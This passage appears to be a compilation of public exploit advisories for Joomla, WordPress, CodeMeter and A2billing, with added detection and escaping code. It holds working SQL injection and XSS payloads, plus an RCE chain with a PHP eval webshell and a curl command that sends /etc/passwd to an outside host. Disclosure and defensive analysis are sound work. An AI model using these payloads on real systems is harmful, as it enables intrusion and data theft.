        Payload: prod_page=1&post=load_more_elements_into_catalog&catalog_id=-5943 UNION ALL SELECT 2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,2434,CONCAT(0x717a627871,0x494a475477424c724f6f7853556d61597544576f4b614d6e41596771595253476c4251797a685974,0x716b787671)-- FvOy&old_count=&count_into_page=&show_thumbs=&show_description=&parmalink=
    ---
    [16:48:10] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Debian 8.0 (jessie)
    web application technology: Apache 2.4.10
    back-end DBMS: MySQL >= 5.0.12
    [16:48:10] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 6637 times
    [16:48:10] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/example.com'

    [*] shutting down at 16:48:10
  18. Hacking

    # # # # # #
    # Exploit Title: Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection
    # Dork: N/A
    # Date: 30.08.2017
    # Vendor Homepage: http://joomplace.com/
    # Software Link: https://extensions.joomla.org/extensions/extension/living/education-a-culture/quiz-deluxe/
    # Demo: http://demo30.joomplace.com/our-products/joomla-quiz-deluxe
    # Version: 3.7.4
    # Category: Webapps
    # Tested on: WiN7_x64/KaLiLinuX_x64
    # CVE: N/A
    # # # # # #
    # Exploit Author: Ihsan Sencan
    # Author Web: http://ihsan.net
    # Author Social: @ihsansencan
    # # # # # #
    # Description:
    # The vulnerability allows an attacker to inject sql commands....
    #
    # Proof of Concept:
    #
    # http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&stu_quiz_id=[SQL]
    # http://localhost/[PATH]/index.php?option=com_joomlaquiz&task=ajaxaction.flag_question&tmpl=component&flag_quest=[SQL]
    #
    # Etc..
    # # # # # #
  19. # Exploit Title: Unauthenticated SQL Injection in Huge-IT Video Gallery v1.0.9 for Joomla
    # Google Dork: [if applicable]
    # Date: 2016-09-15
    # Exploit Author: Larry W. Cashdollar, @_larry0
    # Vendor Homepage: http://huge-it.com/joomla-video-gallery/
    # Software Link:
    # Version: 1.0.9
    # Tested on: Linux
    # CVE: CVE-2016-1000123
    # Advisory: http://www.vapidlabs.com/advisory.php?v=169
    # Exploit:

    $ sqlmap -u 'http://server/components/com_videogallerylite/ajax_url.php' --data="page=1&galleryid=*&task=load_videos_content&perpage=20&linkbutton=2"
    .
    .
    .
    (custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
    sqlmap identified the following injection point(s) with a total of 2870 HTTP(s) requests:
    ---
    Parameter: #1* ((custom) POST)
        Type: error-based
        Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
        Payload: page=1&galleryid=-3390 OR 1 GROUP BY CONCAT(0x716b766271,(SELECT (CASE WHEN (2575=2575) THEN 1 ELSE 0 END)),0x7170767071,FLOOR(RAND(0)*2)) HAVING MIN(0)#&task=load_videos_content&perpage=20&linkbutton=2

        Type: AND/OR time-based blind
        Title: MySQL >= 5.0.12 time-based blind - Parameter replace
        Payload: page=1&galleryid=(CASE WHEN (5952=5952) THEN SLEEP(5) ELSE 5952 END)&task=load_videos_content&perpage=20&linkbutton=2
    ---
    [19:36:55] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Debian 8.0 (jessie)
    web application technology: Apache 2.4.10
    back-end DBMS: MySQL >= 5.0.12
    [19:36:55] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 2714 times
    [19:36:55] [INFO] fetched data logged to text files under '/home/larry/.sqlmap/output/192.168.0.4'

    [*] shutting down at 19:36:55
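The SQL injection entries on this page fall into two families: hand-written payloads that hide keywords inside MySQL versioned comments and mixed case (`/*!11112UniOn*/`, `/*!44455sEleCT*/`, the `'or 1=1 or ''='` login bypass, FineCMS's URL-encoded `sleep(1)`), and sqlmap's generated error-based (`FLOOR(RAND(0)*2) ... GROUP BY ... HAVING`) and time-based (`CASE WHEN ... THEN SLEEP(5)`) payloads from the three Huge-IT advisories. The block below is an added detection-engineering example, not part of any of the advisories or of sqlmap: it normalises a parameter value the way MySQL will read it (URL-decode, unwrap `/*!NNNNN ... */` bodies, which MySQL executes, drop plain comments, fold case and whitespace) and only then matches signatures, so the obfuscation buys the attacker nothing. The signature names and the benign samples are my own; every attack sample is copied from the advisories above.

```python
import re
from urllib.parse import unquote_plus

# Signatures are evaluated only after normalisation; names are what an alert would carry.
RULES = {
    "union_select": re.compile(r"\bunion\b(\s+all)?\s+select\b"),
    "tautology": re.compile(r"\bor\s+(\d+)\s*=\s*\1\b|'\s*=\s*'"),
    "time_delay": re.compile(r"\b(sleep|benchmark)\s*\("),
    "error_floor_rand": re.compile(r"floor\s*\(\s*rand\s*\(\s*0\s*\)\s*\*\s*2\s*\)"),
    "schema_probe": re.compile(r"\binformation_schema\b"),
    "fingerprint_funcs": re.compile(r"\b(database|version|user)\s*\(\s*\)"),
    "comment_terminator": re.compile(r"(--\s|--$|#\s*$)"),
}

# MySQL executes the body of /*!NNNNN ... */ (version-conditional comments); other
# engines and naive filters treat it as a comment. /**/ is commonly used as whitespace.
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,5}\s*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalise(raw: str) -> str:
    """Reduce a parameter value to the form the SQL parser would actually see."""
    s = raw
    for _ in range(2):                      # tolerate one level of double URL-encoding
        decoded = unquote_plus(s)           # also turns '+' into a space, as the server does
        if decoded == s:
            break
        s = decoded
    s = VERSIONED_COMMENT.sub(r" \1 ", s)   # /*!11112UniOn*/ -> UniOn
    s = PLAIN_COMMENT.sub(" ", s)
    return re.sub(r"\s+", " ", s).strip().lower()


def classify(value: str) -> list:
    """Names of every signature the normalised value triggers (empty list = no alert)."""
    n = normalise(value)
    return sorted(name for name, rx in RULES.items() if rx.search(n))


# Attack samples copied from the advisories above; benign samples are constructed.
SAMPLES = {
    "login_bypass": "'or 1=1 or ''='",
    "union_versioned": "'+/*!11112UniOn*/+/*!11112sELeCT*/+0x31,0x32,/*!11112coNcAT_Ws*/(0x7e,"
                       "/*!11112usER*/(),/*!11112DatAbASe*/(),/*!11112vErsIoN*/())--+-",
    "error_based_versioned": "755'AnD+(/*!44455sEleCT*/+0x31+/*!44455FrOM*/+(/*!44455sEleCT*/+cOUNT(*),"
                             "/*!44455CoNCAt*/((/*!44455sEleCT*/(/*!44455sEleCT*/+/*!44455CoNCAt*/"
                             "(cAst(dATABASE()+As+char),0x7e,0x496873616E53656e63616e))+/*!44455FrOM*/"
                             "+infOrMation_schEma.tables+/*!44455WherE*/+table_schema=dATABASE()+limit+0,1),"
                             "floor(raND(0)*2))x+/*!44455FrOM*/+infOrMation_schEma.tABLES+/*!44455gROUP*/"
                             "+bY+x)a)+aND+''='",
    "finecms_sleep": "1%27%2Csleep%281%29%2C%271",
    "sqlmap_error": "-2264 OR 1 GROUP BY CONCAT(0x71716a7a71,(SELECT (CASE WHEN (3883=3883) THEN 1 "
                    "ELSE 0 END)),0x7178627071,FLOOR(RAND(0)*2)) HAVING MIN(0)#",
    "sqlmap_time": "(CASE WHEN (9445=9445) THEN SLEEP(5) ELSE 9445 END)",
    "benign_id": "755",
    "benign_name": "O'Neil & Sons #1",
}


def run_demo() -> dict:
    return {label: classify(value) for label, value in SAMPLES.items()}


if __name__ == "__main__":
    for label, hits in run_demo().items():
        print(f"{label:24s} {hits or '-'}")
```

This is a triage aid for logs and WAF tuning, not a fix: the applications above are fixed by parameterised queries (PDO or mysqli prepared statements), which is exactly the contrast the FineCMS advisory draws between its PDO code and the one mysqli call in excludes.php.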
  20. # Exploit Title: Wordpress Plugin Participants Database < 1.7.5.10 - XSS
    # Google Dork: inurl:wp-content/plugins/participants-database/
    # Date: 01-Sep-17
    # Exploit Author: Benjamin Lim
    # Vendor Homepage: https://xnau.com/
    # Software Link: https://wordpress.org/plugins/participants-database/
    # Version: 1.7.5.9
    # Tested on: Kali Linux 2.0
    # CVE: CVE-2017-14126

    1. Product & Service Introduction:
    ==================================
    Participants Database is a Wordpress plugin for managing a database of participants, members or volunteers. As of now, the plugin has been downloaded 320,000 times and has 10,000+ active installs.

    2. Technical Details & Description:
    ===================================
    A cross-site scripting (XSS) vulnerability in the Wordpress Participants Database plugin 1.7.5.9 allows attackers to inject arbitrary JavaScript via the Name parameter. The XSS vulnerability is found in the participant signup form input text field. The get_field_value_display() function in PDb_FormElement.class.php did not escape HTML special characters, allowing an attacker to input JavaScript. The XSS code will be executed on 2 pages:
    1) The "Thank you for signing up" page immediately after submitting the form.
    2) The page which is configured to output the list of participants with the [pdb_list] shortcode.

    3. Proof of Concept (PoC):
    ==========================
    curl -k -F action=signup -F subsource=participants-database -F shortcode_page=/?page_id=1 -F thanks_page=/?page_id=1 -F instance_index=2 -F pdb_data_keys=1.2.9.10 -F session_hash=0123456789 -F first_name=<script>alert("1");</script> -F last_name=a -F [email protected] -F mailing_list=No -F submit_button=Submit http://localhost/?page_id=1

    To trigger manually, browse to the page, input the following in the form and click Sign Up.
    First Name: <script>alert("1");</script>
    Last Name: test
    Email: [email protected]

    4. Mitigation
    =============
    Update to version 1.7.5.10

    5. Disclosure Timeline
    ======================
    2017/09/01 Vendor contacted
    2017/09/02 Vendor responded
    2017/09/03 Update released
    2017/09/06 Advisory released to the public

    6. Credits & Authors:
    =====================
    Benjamin Lim - [https://limbenjamin.com]

    --
    *Benjamin Lim*
    E: [email protected]
    PGP: https://limbenjamin.com/pgp
  21. Hacking

Document Title:
===============
Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2074

ID: FB49498

Acknowledgements: https://www.flickr.com/photos/vulnerabilitylab/36912680045/
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13754

CVE-ID:
=======
CVE-2017-13754

Release Date:
=============
2017-09-04

Vulnerability Laboratory ID (VL-ID):
====================================
2074

Common Vulnerability Scoring System:
====================================
3.5

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
CodeMeter is the universal technology for software publishers and intelligent device manufacturers, upon which all solutions from Wibu-Systems are built. You want to protect the software you have developed against piracy and reverse engineering. CodeMeter requires your attention only once: its integration in your software and your business workflow is necessary at one point in time only. Protection Suite is the tool that automatically encrypts your applications and libraries. In addition, CodeMeter offers an API for custom integration with your software.

(Copy of the Homepage: http://www.wibu.com/us/codemeter.html )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the official Wibu Systems CodeMeter WebAdmin v6.50 application.

Vulnerability Disclosure Timeline:
==================================
2017-05-20: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
2017-05-21: Vendor Notification (Wibu Systems AG - Security Department)
2017-05-22: Vendor Response/Feedback (Wibu Systems AG - Security Department)
2017-08-01: Vendor Fix/Patch (Wibu Systems AG - Service Developer Team)
2017-08-20: Security Acknowledgements (Wibu Systems AG - Security Department)
2017-09-04: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Wibu-Systems AG
Product: CodeMeter & Control Panel - WebAdmin (Web-Application) 6.50.2624.500

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Technical Details & Description:
================================
A persistent input validation vulnerability has been discovered in the Wibu Systems AG CodeMeter WebAdmin v6.50 web-server web-application. The vulnerability allows remote attackers to inject their own malicious script code on the application side into the vulnerable function or module, and to follow up with a compromising attack.

The input validation vulnerability has been discovered in the `server name` input field of the `advanced settings - time server` module. The request method to inject is POST and the attack vector is located on the application side. First the attacker injects the payload, then the POST request is performed to save the content permanently. After that, the issue triggers an execution on each visit. The basic validation in the application is well set up, but in the advanced settings the validation is not implemented, so this function is not secured at all. The vulnerability is a classic filter input validation vulnerability. The application sets no session cookies, which lowers the attack risk, but not enough to ignore it.

The vulnerable files are `ChangeConfiguration.html`, `time_server_list.html` and `certified_time.html`. The `ChangeConfiguration.html` is marked as the injection point for the payload. The `time_server_list.html` and `certified_time.html` files are marked as the execution point of the issue. The security issue was uncovered during the blurrybox hacking contest of the Wibu Systems AG and acknowledged by the management.

The security risk of the persistent input validation issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5. Exploitation of the persistent input validation web vulnerability requires low user interaction and a privileged web-application user account. Successful exploitation of the vulnerability results in persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected or connected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Advanced Settings - Time Server

Vulnerable File(s):
[+] ChangeConfiguration.html

Vulnerable Parameter(s):
[+] server name

Affected Module(s):
[+] time_server_list.html
[+] certified_time.html

Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by remote attackers with a privileged user account and with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Start the CodeMeter software
2. Open the webadmin gui
3. Move to advanced settings
4. Open the time-server module
5. Click the plus to add a new time server
Note: The request method is POST
6. Inject a test script code payload with matching domain and save via POST
7. The code is saved and, when read back from the dbms, executes in the time-server list module index
8. Successful reproduce of the vulnerability!

Note: The method can be automated with a POST request tool that includes the payload.

PoC: Payload (Exploitation)
cmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>
cmtime.codehacker.de/>"<iframe src="evil.source" onload=alert("GUTENMORGEN")>

PoC: Vulnerable Source
<div id="time_server_to_add"><input id="TimeServerId1" name="time_server_list_list" value="cmtime.codemeter.com" type="radio"><label class="time_server_list_list_label" for="TimeServerId1"><span class="ct100_t bld ssl_number_space">1. </span>cmtime.codemeter.com<span class="ssl_up" onclick="onClickSSLUp(this);" style="visibility: hidden;"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"> </span></span></label>
<input id="TimeServerId3" name="time_server_list_list" value="cmtime.codemeter.de" type="radio"> <label class="time_server_list_list_label" for="TimeServerId3"><span class="ct100_t bld ssl_number_space">2. </span>cmtime.codemeter.de <span class="ssl_up" onclick="onClickSSLUp(this);"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"></span></span></label>
<input id="TimeServerId4" name="time_server_list_list" value="cmtime.codemeter.us" type="radio"><label class="time_server_list_list_label" for="TimeServerId4"> <span class="ct100_t bld ssl_number_space">3. </span>cmtime.codemeter.us<span class="ssl_up" onclick="onClickSSLUp(this);"> <span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);" style="visibility: visible;"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);"> <span class="fa fa-trash-o fa-list-buttons"></span></span></label>
<input id="cmtime.codehacker.de/>" <img="" src="evil.source">" type="radio" name="time_server_list_list" value="cmtime.codehacker.de/>"<img src="evil.source">"/><label class="time_server_list_list_label" for="cmtime.codehacker.de/>" <img="" src="evil.source">"><span id="ssl_number_cmtime.codehacker.de/>" <img="" src="evil.source">"[EXECUTABLE PAYLOAD!] class="ct100_t bld ssl_number_space"></span>cmtime.codehacker.de/>"<img src="evil.source"><span class="ssl_up" onclick="onClickSSLUp(this);"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);" style="visibility: hidden;"><span class="fa fa-arrow-down fa-list-buttons"></span></span> <span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"></span></span></label></div>

--- PoC Session Logs ---
Status: 200[OK]
POST http://localhost:22350/actions/ChangeConfiguration.html
Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Content size[1544] Mime Type[text/html]
Request Header:
Host[localhost:22350]
User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Content-Type[application/x-www-form-urlencoded]
Content-Length[255]
Referer[http://localhost:22350/configuration/certified_time.html]
Cookie[com.wibu.cm.webadmin.lang=de-DE]
Connection[keep-alive]
Upgrade-Insecure-Requests[1]
POST data:
Action[CertifiedTimeConfiguration]
TimeServerList[cmtime.codemeter.com%7Ccmtime.codemeter.de%7Ccmtime.codemeter.us%7Ccmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>%7C]
SoapTimeOut[20]
certified_time_time_out[20]
ApplyButton[Apply]
WaFormGuard[v0V839tW3xkpa6jC26kYsvZJxe0UFJCl4%2FB2ipA6Xpwv]
Response Header:
Server[WIBU-SYSTEMS HTTP Server]
Date[21 May 2017 16:00:21 +0000]
Content-Type[text/html; charset=utf-8]
X-Frame-Options[SAMEORIGIN]
x-xss-protection[1; mode=block]
Accept-Ranges[bytes]
Content-Length[1544]
-
Status: 200[OK]
GET http://localhost:22350/configuration/iframe/evil.source [PAYLOAD EXECUTION]
Load Flags[LOAD_NORMAL] Content size[2320] Mime Type[text/html]
Request Header:
Host[localhost:22350]
User-Agent[zero-zero]
Accept[*/*]
Referer[http://localhost:22350/configuration/iframe/time_server_list.html]
Cookie[com.wibu.cm.webadmin.lang=de-DE]
Connection[keep-alive]
Response Header:
Server[WIBU-SYSTEMS HTTP Server]
Date[19 May 2017 21:02:23 +0000]
Connection[close]
Content-Type[text/html; charset=utf-8]
X-Frame-Options[SAMEORIGIN]
x-xss-protection[1; mode=block]
Accept-Ranges[bytes]
Content-Length[2320]
-
Status: 200[OK]
GET http://localhost:22350/configuration/iframe/evil.source
Mime Type[text/html]
Request Header:
Host[localhost:22350]
User-Agent[zero-zero]
Accept[*/*]
Referer[http://localhost:22350/configuration/iframe/time_server_list.html]
Cookie[com.wibu.cm.webadmin.lang=de-DE]
Connection[keep-alive]
Response Header:
Server[WIBU-SYSTEMS HTTP Server]
Date[19 May 2017 21:06:56 +0000]
Connection[close]
Content-Type[text/html; charset=utf-8]
X-Frame-Options[SAMEORIGIN]
x-xss-protection[1; mode=block]
X-Content-Type-Options[nosniff]
Accept-Ranges[bytes]
Content-Length[2320]

Reference(s):
http://localhost:22350/
http://localhost:22350/configuration/
http://localhost:22350/configuration/ChangeConfiguration.html
http://localhost:22350/configuration/certified_time.html
http://localhost:22350/configuration/time_server_list.html

Solution - Fix & Patch:
=======================
1. Restrict the input field and disallow the usage of special chars, as in the other input fields
2. Parse the input field and escape the content
3. Parse the output location of the item in the visible listing
4. Set up secure exception handling to handle illegal events
5. Include a proper validation mask in the form to prevent further injection attacks

The security vulnerability has been patched in the version 6.50b.

Security Risk:
==============
The security risk of the persistent input validation web vulnerability in the web-server webadmin web-application is estimated as medium (CVSS 3.5). Earlier version releases up to codemeter 6.50 may be affected as well by the cross site scripting web vulnerability.

Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, phone numbers, conversations or anything else to journalists, investigative authorities or private individuals.

Domains: www.vulnerability-lab.com - www.vulnerability-db.com - www.evolution-sec.com
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register.php
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Social: twitter.com/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab

Any modified copy or reproduction, including partial usage, of this file, resources or information requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact ([email protected]) to ask for permission.

Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™

--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
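The Participants Database finding (post 20, get_field_value_display() writing the name field raw) and the CodeMeter finding above (the time-server name written raw into an id attribute and again as label text) fail in the same way, and the fix and the test are the same for both. What follows is an added example, not code from either advisory, plugin or vendor: a template shaped like the CodeMeter radio list (the exact template markup is an assumption) rendered once without escaping and once through html.escape(), and a checker built on Python's HTMLParser that reports whether the stored value came back as executable markup (a script-bearing tag or an on* event attribute) rather than as text. That is the check to run on the list page: a substring search for the payload is not enough, because an escaped copy also "contains" it.

```python
import html
from html.parser import HTMLParser

# Payloads quoted from the two advisories.
PAYLOAD_WP = '<script>alert("1");</script>'
PAYLOAD_CM = 'cmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>'


def render_vulnerable(values):
    """Unescaped template (assumed shape): the value lands in an attribute and as text,
    which is what the CodeMeter 'Vulnerable Source' above shows for the injected entry."""
    return "".join(
        f'<input id="{v}" type="radio" value="{v}"><label for="{v}">{v}</label>'
        for v in values)


def render_fixed(values):
    """Same template, every interpolation passed through html.escape(quote=True):
    & < > " ' become entities, so a value can neither close the attribute nor open a tag."""
    esc = lambda v: html.escape(v, quote=True)
    return "".join(
        f'<input id="{esc(v)}" type="radio" value="{esc(v)}"><label for="{esc(v)}">{esc(v)}</label>'
        for v in values)


class ActiveContentScanner(HTMLParser):
    """Collects (tag, attribute) pairs that a browser would execute: script-bearing
    elements, on* event handlers and javascript: URLs. HTMLParser tokenizes tolerantly,
    close enough to a browser to tell 'markup' from 'text' for this purpose."""
    ACTIVE_TAGS = {"script", "iframe", "object", "embed"}

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag in self.ACTIVE_TAGS:
            self.hits.append((tag, None))
        for name, value in attrs:
            if name.startswith("on"):
                self.hits.append((tag, name))
            elif name in ("src", "href") and value and value.strip().lower().startswith("javascript:"):
                self.hits.append((tag, name))


def active_content(doc):
    scanner = ActiveContentScanner()
    scanner.feed(doc)
    scanner.close()
    return scanner.hits


def stored_xss_confirmed(doc, payload):
    """True only when the payload is present AND the parser sees executable markup."""
    return payload in doc and bool(active_content(doc))


if __name__ == "__main__":
    for name, payload in (("WordPress", PAYLOAD_WP), ("CodeMeter", PAYLOAD_CM)):
        print(name, "raw   :", active_content(render_vulnerable([payload])))
        print(name, "escaped:", active_content(render_fixed([payload])))
```

Note that the escaped rendering still shows the attacker's string on the page, which is fine; the advisories' payloads (and a benign `O'Brien & Sons`) all survive as text, and only the unescaped rendering yields a `script` element or an `onload` attribute.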
22. # Title : A2billing 2.x , Unauthenticated Backup dump / RCE flaw
# Vulnerable software : A2billing 2.x
# Author : Ahmed Sultan (0x4148)
# Email : [email protected]
# Home : 0x4148.com
# Linkedin : https://www.linkedin.com/in/0x4148/

A2billing contains multiple flaws which can be chained together to achieve shell access over the a2b instance. If you're looking for deep technical stuff, check out the full writeup at https://0x4148.com/2016/10/28/a2billing-rce/

1. Backup dump

Vulnerable code
File : admin/public/form_data/FG_var_backup.inc

getpost_ifset(array('name','path','creationdate'));
$HD_Form = new FormHandler("cc_backup","Backup");
$HD_Form -> FG_DEBUG = 0;

if ($form_action!='ask-add') check_demo_mode();

if ($form_action == 'add'){
    $backup_file = $path;
    if (substr($backup_file,-3)=='.gz'){
        // WE NEED TO GZIP
        $backup_file = substr($backup_file,0,-3);
        $do_gzip=1;
    }
    // Make the backup stuff here and redirect to success page
    //mysqldump -all --databases mya2billing -ua2billinguser -pa2billing > /tmp/test.sql
    //pg_dump -c -d -U a2billinguser -h localhost -f /tmp/test.sql mya2billing
    if (DB_TYPE != 'postgres'){
        $run_backup=MYSQLDUMP." -all --databases ".DBNAME." -u'".USER."' -p'".PASS."' > '{$backup_file}'";
    }else{
        $env_var="PGPASSWORD='".PASS."'";
        putenv($env_var);
        $run_backup=PG_DUMP." -c -d -U ".USER." -h ".HOST." -f '{$backup_file}' ".DBNAME;
    }
    if ($FG_DEBUG == 1 ) echo $run_backup."<br>";
>>>>    exec($run_backup,$output,$error);
    if ($do_gzip){
        // Compress file
        $run_gzip = GZIP_EXE." '$backup_file'";
        if ($FG_DEBUG == 1 ) echo $run_gzip."<br>";
>>>>    exec($run_gzip,$output,$error_zip);
    }

The file is included by "admin/Public/A2B_entity_backup.php" before the authentication check takes place, so to dump a full backup we can just browse to:

http://HOST//a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.sql

The backup will be found at admin/Public/0x4148.sql

Some hardening is carried out by the application, which did a good job of preventing a direct RCE flaw here, so we had to figure out something else.

2. SQL injection

File name : ckeckout_process.php
Line 287 :

$Query = "INSERT INTO cc_payments_agent ( agent_id, agent_name, agent_email_address, item_name, item_id, item_quantity, payment_method, cc_type, cc_owner, cc_number, " .
         " cc_expires, orders_status, last_modified, date_purchased, orders_date_finished, orders_amount, currency, currency_value) values (" .
         " '".$transaction_data[0][1]."', '".$customer_info[3]." ".$customer_info[2]."', '".$customer_info["email"]."', 'balance', '". $customer_info[0]."', 1, '$pmodule', '".$_SESSION["p_cardtype"]."', '".$transaction_data[0][5]."', '".$transaction_data[0][6]."', '". $transaction_data[0][7]."', $orderStatus, '".$nowDate."', '".$nowDate."', '".$nowDate."', ".$amount_paid.", '".$currCurrency."', '". $currencyObject->get_value($currCurrency)."' )";
$result = $DBHandle_max -> Execute($Query);

By exploiting this flaw we can insert malicious data into the db using the following query <thanks to i-Hmx for the great hint>

transactionID=456789111111 unise//**lecton selinse//**rtect 1,2,3,4,0x706c75676e706179,0x3c3f706870206576616c286261736536345f6465636f646528245f504f53545b6e61696c69745d29293b203f3e,7,8,9,10,11,12,13-//**- -&sess_id=4148&key=98346a2b29c131c78dc89b50894176eb

After sending this request the following payload will be injected directly into the DB:

<?php eval(base64_decode($_POST[nailit])); ?>

3. RCE

After injecting the malicious code we can just dump the backup again, but this time we name it "0x4148.php", so our code can be executed :)

# curl 'https://127.0.0.1/a2billing/admin/Public/A2B_entity_backup.php?form_action=add&path=0x4148.php' --insecure
# cat 0x4148.php | grep nailit
INSERT INTO `cc_payments_agent` VALUES (295,2,' ','','balance','',1,'plugnpay','','66666666666666666666666666666666666666666666','77777777777777777777777777777777','8',-1,'3.000000','2016-10-28 10:57:10','2016-10-28 10:57:10','2016-10-28 10:57:10','usd','0.000000'),(296,2,' ','','balance','',1,'plugnpay','','<?php eval(base64_decode($_POST[nailit])); ?>','7','8',-1,'3.000000','2016-10-28 10:58:22','2016-10-28 10:58:22','2016-10-28 10:58:22','usd','0.000000');

Now just exploit it by POSTing nailit=<base64-encoded PHP code> to admin/Public/0x4148.php. For instance

system('x=$(cat /etc/passwd);curl -d "$x" http://x.x.x.x:8000/0x4148.jnk');

will read /etc/passwd and send it to our nc listener.

Exploit timeline :
01/10/2016 : vulnerability reported to vendor
06/10/2016 - 12/2016 : talks talks talks with promises of fixing ASAP
04/09/2017 : Public release

Credits,
Ahmed Sultan - Cyber Security Analyst @ EG-CERT
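The chain above does not depend on shell metacharacters in the `path` parameter (the advisory notes A2billing handles those); it depends on three checks being absent from one code path: the backup action runs before authentication, the destination name is taken verbatim and resolved inside the web root, and the dump's contents are partly attacker-controlled rows. The following is an added example, not A2billing code: it mirrors the shape of the MySQL branch of FG_var_backup.inc in Python, shows why a dump named 0x4148.php under the web root becomes code execution, and then rewrites the same action with each link broken. The web root, backup directory and defaults file are assumptions; the database name and credentials are the ones in the file's own comment.

```python
import os
from pathlib import PurePosixPath

# Assumptions, not from the advisory: where the admin UI lives and where dumps should go.
WEBROOT = PurePosixPath("/var/www/a2billing/admin/Public")
BACKUP_DIR = PurePosixPath("/var/backups/a2billing")      # a directory the web server never serves
# Values taken from the commented-out mysqldump line in FG_var_backup.inc.
DBNAME, DBUSER, DBPASS = "mya2billing", "a2billinguser", "a2billing"


def vulnerable_backup_target(path):
    """FG_var_backup.inc resolves the user-supplied `path` relative to the script's own
    directory, i.e. inside the web root, and checks neither extension nor directory."""
    return WEBROOT / path


def vulnerable_backup_command(path):
    """The string handed to exec(): same shape as the MySQL branch in the advisory."""
    target = str(vulnerable_backup_target(path))
    if target.endswith(".gz"):
        target = target[:-3]          # stripped here; gzip appends it again afterwards
    return f"mysqldump -all --databases {DBNAME} -u'{DBUSER}' -p'{DBPASS}' > '{target}'"


def served_as_php(target):
    """Third link of the chain: a dump written under the web root with a .php name is run
    by the PHP interpreter, and the injected cc_payments_agent row is its script body."""
    return target.suffix == ".php" and WEBROOT in target.parents


def backup_rejection_reason(path, session_is_admin):
    """Hardened version of the same action. Returns None when the request is acceptable,
    otherwise the reason it is refused (one per broken link of the chain)."""
    if not session_is_admin:
        return "authentication must be checked before the backup action runs"
    name = os.path.basename(path)
    if name != path or name.startswith("."):
        return "directory components are not allowed in the backup name"
    if not name.endswith(".sql"):
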